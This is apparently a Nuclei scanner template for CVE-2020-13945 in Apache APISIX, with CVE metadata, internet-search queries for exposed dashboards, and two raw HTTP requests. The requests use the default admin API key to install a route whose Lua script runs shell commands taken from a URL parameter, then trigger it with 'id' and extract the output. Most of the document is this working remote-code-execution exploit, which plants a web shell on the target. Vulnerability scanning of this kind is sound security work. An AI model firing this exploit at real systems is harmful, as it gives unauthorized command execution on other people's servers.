id: CVE-2020-13945

info:
  name: Apache APISIX - Insufficiently Protected Credentials
  author: pdteam
  severity: medium
  description: Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data.
  impact: |
    The vulnerability could result in unauthorized access to sensitive information, leading to potential data breaches or unauthorized actions.
  remediation: |
    Upgrade to the latest version of Apache APISIX, which includes a fix for the vulnerability. Additionally, ensure that sensitive credentials are properly protected and stored securely.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945
    - https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E
    - http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13945
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-13945
    cwe-id: CWE-522
    epss-score: 0.00838
    epss-percentile: 0.81705
    cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: apisix
    shodan-query: http.title:"apache apisix dashboard"
    fofa-query: title="apache apisix dashboard"
    google-query: intitle:"apache apisix dashboard"
  tags: cve2020,cve,intrusive,vulhub,packetstorm,apache,apisix

http:
  - raw:
      - |
        POST /apisix/admin/routes HTTP/1.1
        Host: {{Hostname}}
        X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
        Content-Type: application/json

        {
          "uri":"/{{randstr}}",
          "script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f =        assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
          "upstream":{
            "type":"roundrobin",
            "nodes":{
              "interact.sh:80":1
            }
          }
        }
      - |
        GET /{{randstr}}?cmd=id HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"action":"create"'
          - '"script":'
          - '"node":'
        condition: and

      - type: status
        status:
          - 201

    extractors:
      - type: regex
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
# digest: 4a0a00473045022057cc3dae9991d781ea248b25c769d1453bf07dc4e932b89d0d4cc89866fd5232022100e47028445bd336e7e8446d06b6d5e9cf43ab09aa6883799f4d42ddfd609283ff:922c64590222798bb761d5b6d8e72950